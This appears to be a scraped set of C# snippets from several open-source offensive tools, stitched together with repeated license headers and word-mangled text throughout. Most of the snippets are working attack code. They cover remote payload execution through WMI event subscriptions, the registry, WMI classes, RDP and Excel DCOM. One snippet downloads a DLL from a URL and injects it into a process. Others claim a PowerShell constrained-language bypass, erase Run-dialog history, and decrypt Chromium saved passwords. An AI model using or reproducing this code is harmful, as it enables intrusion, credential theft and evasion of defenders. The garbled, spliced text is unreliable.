with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void WriteToFileWMI(string host, string eventName, string username, string preplacedword)
{
try
{
ConnectionOptions options = new ConnectionOptions();
if (!String.IsNullOrEmpty(username))
{
Console.WriteLine("[*] User credentials : {0}", username);
options.Username = username;
options.Preplacedword = preplacedword;
}
Console.WriteLine();
// first create a 5 second timer on the remote host
ManagementScope timerScope = new ManagementScope(string.Format(@"\\{0}\root\cimv2", host), options);
ManagementClreplaced timerClreplaced = new ManagementClreplaced(timerScope, new ManagementPath("__IntervalTimerInstruction"), null);
ManagementObject myTimer = timerClreplaced.CreateInstance();
myTimer["IntervalBetweenEvents"] = (UInt32)5000;
myTimer["SkipIfPreplaceded"] = false;
myTimer["TimerId"] = "Timer";
try
{
Console.WriteLine("[+] Creating Event Subscription {0} : {1}", eventName, host);
myTimer.Put();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in creating timer object: {0}", ex.Message);
return;
}
ManagementScope scope = new ManagementScope(string.Format(@"\\{0}\root\subscription", host), options);
// then install the __EventFilter for the timer object
ManagementClreplaced wmiEventFilter = new ManagementClreplaced(scope, new ManagementPath("__EventFilter"), null);
WqlEventQuery myEventQuery = new WqlEventQuery(@"SELECT * FROM __TimerEvent WHERE TimerID = 'Timer'");
ManagementObject myEventFilter = wmiEventFilter.CreateInstance();
myEventFilter["Name"] = eventName;
myEventFilter["Query"] = myEventQuery.QueryString;
myEventFilter["QueryLanguage"] = myEventQuery.QueryLanguage;
myEventFilter["EventNameSpace"] = @"\root\cimv2";
try
{
myEventFilter.Put();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in setting event filter : {0}", ex.Message);
}
// now create the ActiveScriptEventConsumer payload (VBS)
ManagementObject myEventConsumer = new ManagementClreplaced(scope, new ManagementPath("ActiveScriptEventConsumer"), null).CreateInstance();
myEventConsumer["Name"] = eventName;
myEventConsumer["ScriptingEngine"] = "VBScript";
myEventConsumer["ScriptText"] = vbsp;
myEventConsumer["KillTimeout"] = (UInt32)45;
try
{
myEventConsumer.Put();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in setting event consumer: {0}", ex.Message);
}
// finally bind them together with a __FilterToConsumerBinding
ManagementObject myBinder = new ManagementClreplaced(scope, new ManagementPath("__FilterToConsumerBinding"), null).CreateInstance();
myBinder["Filter"] = myEventFilter.Path.RelativePath;
myBinder["Consumer"] = myEventConsumer.Path.RelativePath;
try
{
myBinder.Put();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in setting FilterToConsumerBinding: {0}", ex.Message);
}
// wait for everything to trigger
Console.WriteLine("\r\n[+] Waiting 10 seconds for event '{0}' to trigger\r\n", eventName);
System.Threading.Thread.Sleep(10 * 1000);
Console.WriteLine("[+] Done...cleaning up");
// cleanup
try
{
myTimer.Delete();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in removing 'Timer' interval timer: {0}", ex.Message);
}
try
{
myBinder.Delete();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in removing FilterToConsumerBinding: {0}", ex.Message);
}
try
{
myEventFilter.Delete();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in removing event filter: {0}", ex.Message);
}
try
{
myEventConsumer.Delete();
}
catch (Exception ex)
{
Console.WriteLine("[X] Exception in removing event consumer: {0}", ex.Message);
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format("[X] Exception : {0}", ex.Message));
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void WriteToRegKey(string host, string username, string preplacedword, string keypath, string valuename)
{
if (!keypath.Contains(":"))
{
Console.WriteLine("[-] Please put ':' inbetween hive and path: HKCU:Location\\Of\\Key");
return;
}
string[] reginfo = keypath.Split(':');
string reghive = reginfo[0];
string wmiNameSpace = "root\\CIMv2";
UInt32 hive = 0;
switch (reghive.ToUpper())
{
case "HKCR":
hive = 0x80000000;
break;
case "HKCU":
hive = 0x80000001;
break;
case "HKLM":
hive = 0x80000002;
break;
case "HKU":
hive = 0x80000003;
break;
case "HKCC":
hive = 0x80000005;
break;
default:
Console.WriteLine("[X] Error : Could not get the right reg hive");
return;
}
ConnectionOptions options = new ConnectionOptions();
Console.WriteLine("[+] Target : {0}", host);
if (!String.IsNullOrEmpty(username))
{
Console.WriteLine("[+] User : {0}", username);
options.Username = username;
options.Preplacedword = preplacedword;
}
Console.WriteLine();
ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
try
{
scope.Connect();
Console.WriteLine("[+] WMI connection established");
}
catch (Exception ex)
{
Console.WriteLine("[X] Failed to connect to to WMI : {0}", ex.Message);
return;
}
try
{
//Probably stay with string value only
ManagementClreplaced registry = new ManagementClreplaced(scope, new ManagementPath("StdRegProv"), null);
ManagementBaseObject inParams = registry.GetMethodParameters("SetStringValue");
inParams["hDefKey"] = hive;
inParams["sSubKeyName"] = reginfo[1];
inParams["sValueName"] = valuename;
inParams["sValue"] = datavals;
ManagementBaseObject outParams = registry.InvokeMethod("SetStringValue", inParams, null);
if(Convert.ToInt32(outParams["ReturnValue"]) == 0)
{
Console.WriteLine("[+] Created {0} {1} and put content inside", keypath, valuename);
}
else
{
Console.WriteLine("[-] An error occured, please check values");
return;
}
}
catch (Exception ex)
{
Console.WriteLine(String.Format("[X] Error : {0}", ex.Message));
return;
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void RemoveRegValue(string host, string username, string preplacedword, string keypath, string keyname)
{
if (!keypath.Contains(":"))
{
Console.WriteLine("[-] Please put ':' inbetween hive and path: HKCU:Location\\Of\\Key");
return;
}
if (!String.IsNullOrEmpty(host))
{
host = "127.0.0.1";
}
string[] reginfo = keypath.Split(':');
string reghive = reginfo[0];
string wmiNameSpace = "root\\CIMv2";
UInt32 hive = 0;
switch (reghive.ToUpper())
{
case "HKCR":
hive = 0x80000000;
break;
case "HKCU":
hive = 0x80000001;
break;
case "HKLM":
hive = 0x80000002;
break;
case "HKU":
hive = 0x80000003;
break;
case "HKCC":
hive = 0x80000005;
break;
default:
Console.WriteLine("[X] Error : Could not get the right reg hive");
return;
}
ConnectionOptions options = new ConnectionOptions();
Console.WriteLine("[+] Target : {0}", host);
if (!String.IsNullOrEmpty(username))
{
Console.WriteLine("[+] User : {0}", username);
options.Username = username;
options.Preplacedword = preplacedword;
}
Console.WriteLine();
ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wmiNameSpace), options);
try
{
scope.Connect();
Console.WriteLine("[+] WMI connection established");
}
catch (Exception ex)
{
Console.WriteLine("[X] Failed to connecto to WMI : {0}", ex.Message);
return;
}
try
{
//Probably stay with string value only
ManagementClreplaced registry = new ManagementClreplaced(scope, new ManagementPath("StdRegProv"), null);
ManagementBaseObject inParams = registry.GetMethodParameters("DeleteValue");
inParams["hDefKey"] = hive;
inParams["sSubKeyName"] = keypath;
inParams["sValueName"] = keyname;
ManagementBaseObject outParams1 = registry.InvokeMethod("DeleteValue", inParams, null);
Console.WriteLine("[+] Deleted value at {0} {1}", keypath, keyname);
}
catch (Exception ex)
{
Console.WriteLine(String.Format("[-] {0}", ex.Message));
return;
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void Main(string[] args)
{
if (args.Length < 2)
{
Usage();
return;
}
var arguments = new Dictionary<string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
string username = "";
string preplacedword = "";
if (arguments.ContainsKey("username"))
{
if (!arguments.ContainsKey("preplacedword"))
{
Usage();
return;
}
else
{
username = arguments["username"];
preplacedword = arguments["preplacedword"];
}
}
if (arguments.ContainsKey("preplacedword") && !arguments.ContainsKey("username"))
{
Usage();
return;
}
if (arguments.ContainsKey("computername"))
{
string[] computerNames = arguments["computername"].Split(',');
string eventName = "Debug";
string location = "local";
string droplocation = @"C:\Windows\Temp";
string wnamespace = "root\\CIMv2";
string filename = string.Empty;
string valuename = string.Empty;
string keypath = string.Empty;
string clreplacedname = string.Empty;
foreach (string computerName in computerNames)
{
if (arguments.ContainsKey("eventname"))
{
eventName = arguments["eventname"];
}
if (arguments.ContainsKey("location"))
{
location = arguments["location"];
}
if (arguments.ContainsKey("droplocation"))
{
droplocation = arguments["droplocation"];
}
if (arguments.ContainsKey("filename"))
{
filename = arguments["filename"];
}
if (arguments.ContainsKey("clreplacedname"))
{
clreplacedname = arguments["clreplacedname"];
}
if (arguments.ContainsKey("keypath"))
{
keypath = arguments["keypath"];
}
if (arguments.ContainsKey("valuename"))
{
valuename = arguments["valuename"];
}
if (arguments.ContainsKey("wminamespace"))
{
wnamespace = arguments["wminamespace"];
}
if (arguments.ContainsKey("writetype"))
{
if (arguments["writetype"].ToLower() == "wmi")
{
GetFileContent(location, droplocation, filename, "flat");
WriteToFileWMI(computerName, eventName, username, preplacedword);
}
else if (arguments["writetype"].ToLower() == "smb")
{
WriteToFileSMB(computerName, droplocation, filename, location);
}
else if(arguments["writetype"].ToLower() == "registry")
{
if (valuename == string.Empty)
{
Console.WriteLine("[-] Valuename is required");
return;
}
GetFileContent(location, droplocation, filename, "nonflat");
WriteToRegKey(computerName, username, preplacedword, keypath, valuename);
}
else if (arguments["writetype"].ToLower() == "wmiclreplaced")
{
GetFileContent(location, droplocation, filename, "nonflat");
WriteToWMIClreplaced(computerName, username, preplacedword, wnamespace, clreplacedname);
}
else if (arguments["writetype"].ToLower() == "removewmiclreplaced")
{
RemoveWMIClreplaced(computerName, username, preplacedword, wnamespace, clreplacedname);
}
else if (arguments["writetype"].ToLower() == "removeregkey")
{
RemoveRegValue(computerName, username, preplacedword, keypath, valuename);
}
else
{
Usage();
return;
}
}
else
{
Usage();
}
}
}
else
{
Usage();
return;
}
}
19
Source : ExcelDCOM.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void Main(string[] args)
{
var arguments = new Dictionary<string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
if(!arguments.ContainsKey("computername"))
{
Console.WriteLine("[-] Error: computername arg is required");
return;
}
else
{
string arch = "x86";
string target = arguments["computername"];
if (arguments.ContainsKey("arch"))
{
if(arguments["arch"].ToLower() == "x64" || arguments["arch"] == "64")
{
arch = "x64";
}
}
ExecExcelDCOM(target, arch);
}
}
19
Source : Program.cs
with MIT License
from 0xd4d
with MIT License
from 0xd4d
static int Main(string[] args) {
try {
switch (System.Runtime.InteropServices.RuntimeInformation.ProcessArchitecture) {
case System.Runtime.InteropServices.Architecture.X64:
case System.Runtime.InteropServices.Architecture.X86:
break;
default:
throw new ApplicationException($"Unsupported CPU arch: {System.Runtime.InteropServices.RuntimeInformation.ProcessArchitecture}");
}
var jitDasmOptions = CommandLineParser.Parse(args);
if (!string2.IsNullOrEmpty(jitDasmOptions.LoadModule)) {
#if DEBUG
Console.Error.WriteLine($"Trying to jit methods in module '{jitDasmOptions.LoadModule}' but JitDasm is a debug build, not a release build!");
#endif
MethodJitter.JitMethods(jitDasmOptions.LoadModule, jitDasmOptions.TypeFilter, jitDasmOptions.MethodFilter, jitDasmOptions.RunClreplacedConstructors, jitDasmOptions.replacedemblySearchPaths);
}
var (bitness, methods, knownSymbols) = GetMethodsToDisreplacedemble(jitDasmOptions.Pid, jitDasmOptions.ModuleName, jitDasmOptions.TypeFilter, jitDasmOptions.MethodFilter, jitDasmOptions.HeapSearch);
var jobs = GetJobs(methods, jitDasmOptions.OutputDir, jitDasmOptions.FileOutputKind, jitDasmOptions.FilenameFormat, out var baseDir);
if (!string2.IsNullOrEmpty(baseDir))
Directory.CreateDirectory(baseDir);
var sourceDoreplacedentProvider = new SourceDoreplacedentProvider();
using (var mdProvider = new MetadataProvider()) {
var sourceCodeProvider = new SourceCodeProvider(mdProvider, sourceDoreplacedentProvider);
using (var context = new DisasmJobContext(bitness, knownSymbols, sourceCodeProvider, jitDasmOptions.DisreplacedemblerOutputKind, jitDasmOptions.Diffable, jitDasmOptions.ShowAddresses, jitDasmOptions.ShowHexBytes, jitDasmOptions.ShowSourceCode)) {
foreach (var job in jobs)
Disreplacedemble(context, job);
}
}
return 0;
}
catch (ShowCommandLineHelpException) {
CommandLineParser.ShowHelp();
return 1;
}
catch (CommandLineParserException ex) {
Console.WriteLine(ex.Message);
return 1;
}
catch (ApplicationException ex) {
Console.WriteLine(ex.Message);
return 1;
}
catch (ClrDiagnosticsException ex) {
Console.WriteLine(ex.Message);
Console.WriteLine("Make sure this process has the same bitness as the target process");
return 1;
}
catch (Exception ex) {
Console.WriteLine(ex.ToString());
return 1;
}
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static int reflective_dll_injection(string location)
{
Process[] remote_p = Process.GetProcessesByName("notepad");
int pid = 0;
if (remote_p.Length == 0)
{
//Create Process
Process p = new Process();
p.StartInfo.FileName = "C:\\Windows\\System32\\notepad.exe";
p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
p.Start();
pid = p.Id;
}
else
{
pid = remote_p[0].Id;
}
String dllName = "";
if (location.StartsWith("http"))
{
WebClient wc = new WebClient();
wc.DownloadFile(location, "C:\\Windows\\Temp\\meet.dll");
dllName = "C:\\Windows\\Temp\\meet.dll";
}
else
{
dllName = location;
}
IntPtr hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, pid);
IntPtr address = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
IntPtr bytes = IntPtr.Zero;
bool res = WriteProcessMemory(hProcess, address, Encoding.Default.GetBytes(dllName), dllName.Length, out bytes);
if (res == false)
{
Console.WriteLine("Cannot copy into process");
return -1;
}
IntPtr load_addr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
CreateRemoteThread(hProcess, IntPtr.Zero, 0, load_addr, address, 0, IntPtr.Zero);
return 0;
}
19
Source : Program.cs
with MIT License
from 0xDivyanshu
with MIT License
from 0xDivyanshu
static void powershell_clm(String file_tmp)
{
Console.WriteLine("[+] Powershell CLM bypreplaced!\n");
Runspace rs = RunspaceFactory.CreateRunspace();
String op_file = file_tmp;
PowerShell ps = PowerShell.Create();
while (true)
{
Console.Write("PS:>");
string input = Console.ReadLine();
if (input == "exit")
{
break;
}
ps.AddScript(input + " | Out-File -FilePath " + op_file);
ps.Invoke();
string output = File.ReadAllText(op_file);
Console.WriteLine(output);
File.Delete(op_file);
}
rs.Close();
}
19
Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
static void CleanSingle(string command)
{
string keypath = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU";
string keyvalue = string.Empty;
string regcmd = string.Empty;
if (command.EndsWith("\\1"))
{
regcmd = command;
}
else
{
regcmd = string.Format("{0}\\1", command);
}
try
{
RegistryKey regkey;
regkey = Registry.CurrentUser.OpenSubKey(keypath, true);
if (regkey.ValueCount > 0)
{
foreach (string subKey in regkey.GetValueNames())
{
if(regkey.GetValue(subKey).ToString() == regcmd)
{
keyvalue = subKey;
regkey.DeleteValue(subKey);
Console.WriteLine(regcmd);
Console.WriteLine("[+] Cleaned {0} from HKCU:{1}", command, keypath);
}
}
if(keyvalue != string.Empty)
{
string mruchars = regkey.GetValue("MRUList").ToString();
int index = mruchars.IndexOf(keyvalue);
mruchars = mruchars.Remove(index, 1);
regkey.SetValue("MRUList", mruchars);
}
}
regkey.Close();
}
catch (ArgumentException)
{
Console.WriteLine("[-] Error: Selected Registry value does not exist");
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void WriteToWMIClreplaced(string host, string username, string preplacedword, string wnamespace, string clreplacedname)
{
ConnectionOptions options = new ConnectionOptions();
Console.WriteLine("[+] Target : {0}", host);
if (!String.IsNullOrEmpty(username))
{
Console.WriteLine("[+] User : {0}", username);
options.Username = username;
options.Preplacedword = preplacedword;
}
Console.WriteLine();
ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wnamespace), options);
try
{
scope.Connect();
Console.WriteLine("[+] WMI connection established");
}
catch (Exception ex)
{
Console.WriteLine("[X] Failed to connecto to WMI : {0}", ex.Message);
return;
}
try
{
var nclreplaced = new ManagementClreplaced(scope, new ManagementPath(string.Empty), new ObjectGetOptions());
nclreplaced["__CLreplaced"] = clreplacedname;
nclreplaced.Qualifiers.Add("Static", true);
nclreplaced.Properties.Add("WinVal", CimType.String, false);
nclreplaced.Properties["WinVal"].Qualifiers.Add("read", true);
nclreplaced["WinVal"] = datavals;
//nclreplaced.Properties.Add("Sizeof", CimType.String, false);
//nclreplaced.Properties["Sizeof"].Qualifiers.Add("read", true);
//nclreplaced.Properties["Sizeof"].Qualifiers.Add("Description", "Value needed for Windows");
nclreplaced.Put();
Console.WriteLine("[+] Create WMI Clreplaced : {0} {1}", wnamespace, clreplacedname);
}
catch (Exception ex)
{
Console.WriteLine(String.Format("[X] Error : {0}", ex.Message));
return;
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void RemoveWMIClreplaced(string host, string username, string preplacedword, string wnamespace, string clreplacedname)
{
if (!String.IsNullOrEmpty(wnamespace))
{
wnamespace = "root\\CIMv2";
}
if (!String.IsNullOrEmpty(host))
{
host = "127.0.0.1";
}
ConnectionOptions options = new ConnectionOptions();
Console.WriteLine("[+] Target : {0}", host);
if (!String.IsNullOrEmpty(username))
{
Console.WriteLine("[+] User : {0}", username);
options.Username = username;
options.Preplacedword = preplacedword;
}
Console.WriteLine();
ManagementScope scope = new ManagementScope(String.Format("\\\\{0}\\{1}", host, wnamespace), options);
try
{
scope.Connect();
Console.WriteLine("[+] WMI connection established");
}
catch (Exception ex)
{
Console.WriteLine("[X] Failed to connecto to WMI : {0}", ex.Message);
return;
}
try
{
var rmclreplaced = new ManagementClreplaced(scope, new ManagementPath(clreplacedname), new ObjectGetOptions());
rmclreplaced.Delete();
}
catch (Exception ex)
{
Console.WriteLine(String.Format("[-] {0}", ex.Message));
return;
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void GetFileContent(string paylocation, string droploc, string fname, string dtype)
{
bool uricheck = Uri.IsWellFormedUriString(paylocation, UriKind.RelativeOrAbsolute);
if (paylocation == "local")
{
String plfile = "LOADLOADLOAD";
if(dtype == "flat")
{
String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
vbsp = vbsp.Insert(0, finalpay);
}
else if (dtype == "nonflat")
{
datavals = plfile;
}
}
else
{
if (uricheck)
{
try
{
WebClient webcl = new WebClient();
//May want to change this
webcl.Headers.Add("user-agent", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");
byte[] filedata = webcl.DownloadData(paylocation);
string plfile = Convert.ToBase64String(filedata);
if (dtype == "flat")
{
String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
vbsp = vbsp.Insert(0, finalpay);
}
else if (dtype == "nonflat")
{
datavals = plfile;
}
}
catch (WebException)
{
Console.WriteLine("[X] URL doesnt exist");
return;
}
}
else
{
try
{
Byte[] plbytes = File.ReadAllBytes(paylocation);
String plfile = Convert.ToBase64String(plbytes);
if(dtype == "flat")
{
String finalpay = String.Format("Dim pLoad, fnames, droploc\npLoad =\"{0}\"\nfnames = \"{1}\"\ndroploc = \"{2}\"\n", plfile, fname, droploc);
vbsp = vbsp.Insert(0, finalpay);
}
else if (dtype == "nonflat")
{
datavals = plfile;
}
}
catch (IOException)
{
Console.WriteLine("[X] File doesnt exist");
return;
}
}
}
}
19
Source : Program.cs
with GNU General Public License v3.0
from 0xthirteen
with GNU General Public License v3.0
from 0xthirteen
static void Usage()
{
Console.WriteLine("\n Write Files");
Console.WriteLine("");
Console.WriteLine(" FileWrite.exe computername=host.domain.local writetype=wmi eventname=TestTask location=local droplocation=\"C:\\Windows\\Temp\" filename=move.exe");
Console.WriteLine(" FileWrite.exe computername=host.domain.local writetype=smb droplocation=\"C:\\Windows\\Temp\" filename=move.exe");
}
19
Source : Client.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
private void RdpConnectionOnOnLogonError(object sender, IMsTscAxEvents_OnLogonErrorEvent e)
{
LogonErrorCode = e.lError;
var errorstatus = Enum.GetName(typeof(LogonErrors), (uint)LogonErrorCode);
Console.WriteLine("[-] Logon Error : {0} - {1}", LogonErrorCode, errorstatus);
Thread.Sleep(1000);
if(LogonErrorCode == -5 && takeover == true)
{
// it doesn't go to the logon event, so this has to be done here
var rdpSession = (AxMsRdpClient9NotSafeForScripting)sender;
Thread.Sleep(1000);
keydata = (IMsRdpClientNonScriptable)rdpSession.GetOcx();
Console.WriteLine("[+] Another user is logged on, asking to take over session");
SendElement("Tab");
Thread.Sleep(500);
SendElement("Enter+down");
Thread.Sleep(500);
SendElement("Enter+up");
Thread.Sleep(500);
Console.WriteLine("[+] Sleeping for 30 seconds");
Task.Delay(31000).GetAwaiter().GetResult();
Marshal.ReleaseComObject(rdpSession);
Marshal.ReleaseComObject(keydata);
}
else if (LogonErrorCode != -2)
{
Environment.Exit(0);
}
}
19
Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
static void HowTo()
{
Console.WriteLine("SharpRDP");
Console.WriteLine("");
Console.WriteLine(" Regular RDP Connection");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword");
Console.WriteLine(" Exec as child process of cmd or ps ");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword exec=cmd");
Console.WriteLine(" Use restricted admin mode");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\"");
Console.WriteLine(" Connect first host drives");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"\\\\tsclient\\C\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword connectdrive=true");
Console.WriteLine(" Ask to take over RDP session if another used is logged in (workstation)");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword takeover=true");
Console.WriteLine(" Network level authentication");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword nla=true");
Console.WriteLine(" Execute command elevated through Run Dialog");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword elevated=winr");
Console.WriteLine(" Execute command elevated through task manager");
Console.WriteLine(" SharpRDP.exe computername=domain.target command=\"C:\\Temp\\file.exe\" username=domain\\user preplacedword=preplacedword elevated=taskmgr");
}
19
Source : Program.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
static void Main(string[] args)
{
AppDomain.CurrentDomain.replacedemblyResolve += (sender, argtwo) => {
replacedembly thisreplacedembly = replacedembly.GetEntryreplacedembly();
String resourceName = string.Format("SharpRDP.{0}.dll.bin",
new replacedemblyName(argtwo.Name).Name);
var replacedembly = replacedembly.GetExecutingreplacedembly();
using (var rs = replacedembly.GetManifestResourceStream(resourceName))
using (var zs = new DeflateStream(rs, CompressionMode.Decompress))
using (var ms = new MemoryStream())
{
zs.CopyTo(ms);
return replacedembly.Load(ms.ToArray());
}
};
var arguments = new Dictionary<string, string>();
foreach (string argument in args)
{
int idx = argument.IndexOf('=');
if (idx > 0)
arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
}
string username = string.Empty;
string domain = string.Empty;
string preplacedword = string.Empty;
string command = string.Empty;
string execElevated = string.Empty;
string execw = "";
bool connectdrive = false;
bool takeover = false;
bool nla = false;
if (arguments.ContainsKey("username"))
{
if (!arguments.ContainsKey("preplacedword"))
{
Console.WriteLine("[X] Error: A preplacedword is required");
return;
}
else
{
if (arguments["username"].Contains("\\"))
{
string[] tmp = arguments["username"].Split('\\');
domain = tmp[0];
username = tmp[1];
}
else
{
domain = ".";
username = arguments["username"];
}
preplacedword = arguments["preplacedword"];
}
}
if (arguments.ContainsKey("preplacedword") && !arguments.ContainsKey("username"))
{
Console.WriteLine("[X] Error: A username is required");
return;
}
if ((arguments.ContainsKey("computername")) && (arguments.ContainsKey("command")))
{
Client rdpconn = new Client();
command = arguments["command"];
if (arguments.ContainsKey("exec"))
{
if (arguments["exec"].ToLower() == "cmd")
{
execw = "cmd";
}
else if (arguments["exec"].ToLower() == "powershell" || arguments["exec"].ToLower() == "ps")
{
execw = "powershell";
}
}
if (arguments.ContainsKey("elevated"))
{
if(arguments["elevated"].ToLower() == "true" || arguments["elevated"].ToLower() == "win+r" || arguments["elevated"].ToLower() == "winr")
{
execElevated = "winr";
}
else if(arguments["elevated"].ToLower() == "taskmgr" || arguments["elevated"].ToLower() == "taskmanager")
{
execElevated = "taskmgr";
}
else
{
execElevated = string.Empty;
}
}
if (arguments.ContainsKey("connectdrive"))
{
if(arguments["connectdrive"].ToLower() == "true")
{
connectdrive = true;
}
}
if (arguments.ContainsKey("takeover"))
{
if (arguments["takeover"].ToLower() == "true")
{
takeover = true;
}
}
if (arguments.ContainsKey("nla"))
{
if (arguments["nla"].ToLower() == "true")
{
nla = true;
}
}
string[] computerNames = arguments["computername"].Split(',');
foreach (string server in computerNames)
{
rdpconn.CreateRdpConnection(server, username, domain, preplacedword, command, execw, execElevated, connectdrive, takeover, nla);
}
}
else
{
HowTo();
return;
}
}
19
Source : MethodJitter.cs
with MIT License
from 0xd4d
with MIT License
from 0xd4d
static IEnumerable<Type> GetTypes(replacedembly asm) {
Type?[] allTypes;
try {
allTypes = asm.GetTypes();
}
catch (ReflectionTypeLoadException ex) {
allTypes = ex.Types ?? Array.Empty<Type>();
Console.WriteLine("Failed to load one or more types");
}
bool ignoredTypeMessage = false;
foreach (var type in allTypes) {
if (!(type is null)) {
if (type.IsGenericTypeDefinition) {
if (!ignoredTypeMessage) {
ignoredTypeMessage = true;
Console.WriteLine("Ignoring all generic types");
}
continue;
}
yield return type;
}
}
}
19
Source : MethodJitter.cs
with MIT License
from 0xd4d
with MIT License
from 0xd4d
replacedembly? Resolvereplacedembly(string? name) {
if (name is null)
return null;
if (nameToreplacedembly.TryGetValue(name, out var asm))
return asm;
nameToreplacedembly.Add(name, null);
foreach (var basePath in searchPaths) {
foreach (var ext in asmExtensions) {
var filename = Path.Combine(basePath, name + ext);
if (File.Exists(filename)) {
asm = replacedembly.LoadFile(filename);
nameToreplacedembly[name] = asm;
return asm;
}
}
}
if (!name.EndsWith(".resources", StringComparison.OrdinalIgnoreCase))
Console.WriteLine($"Failed to resolve replacedembly '{name}'");
return null;
}
19
Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3
with GNU General Public License v3.0
from 0xfd3
public static string DecryptWithKey(byte[] encryptedData, byte[] MasterKey)
{
byte[] iv = new byte[] { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; // IV 12 bytes
//trim first 3 bytes(signature "v10") and take 12 bytes after signature.
Array.Copy(encryptedData, 3, iv, 0, 12);
try
{
//encryptedData without IV
byte[] Buffer = new byte[encryptedData.Length - 15];
Array.Copy(encryptedData, 15, Buffer, 0, encryptedData.Length - 15);
byte[] tag = new byte[16]; //AuthTag
byte[] data = new byte[Buffer.Length - tag.Length]; //Encrypted Data
//Last 16 bytes for tag
Array.Copy(Buffer, Buffer.Length - 16, tag, 0, 16);
//encrypted preplacedword
Array.Copy(Buffer, 0, data, 0, Buffer.Length - tag.Length);
AesGcm aesDecryptor = new AesGcm();
var result = Encoding.UTF8.GetString(aesDecryptor.Decrypt(MasterKey, iv, null, data, tag));
return result;
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
19
Source : Chromium.cs
with GNU General Public License v3.0
from 0xfd3
with GNU General Public License v3.0
from 0xfd3
public static byte[] GetMasterKey(string LocalStateFolder)
{
//Key saved in Local State file
string filePath = LocalStateFolder + @"\Local State";
byte[] masterKey = new byte[] { };
if (File.Exists(filePath) == false)
return null;
//Get key with regex.
var pattern = new System.Text.RegularExpressions.Regex("\"encrypted_key\":\"(.*?)\"", System.Text.RegularExpressions.RegexOptions.Compiled).Matches(File.ReadAllText(filePath));
foreach (System.Text.RegularExpressions.Match prof in pattern)
{
if (prof.Success)
masterKey = Convert.FromBase64String((prof.Groups[1].Value)); //Decode base64
}
//Trim first 5 bytes. Its signature "DPAPI"
byte[] temp = new byte[masterKey.Length - 5];
Array.Copy(masterKey, 5, temp, 0, masterKey.Length - 5);
try
{
return ProtectedData.Unprotect(temp, null, DataProtectionScope.CurrentUser);
}
catch (Exception ex)
{
Console.WriteLine(ex.ToString());
return null;
}
}
19
Source : Client.cs
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
with BSD 3-Clause "New" or "Revised" License
from 0xthirteen
private void RunRun()
{
if(runtype == "taskmgr")
{
Console.WriteLine("[+] Running task manager");
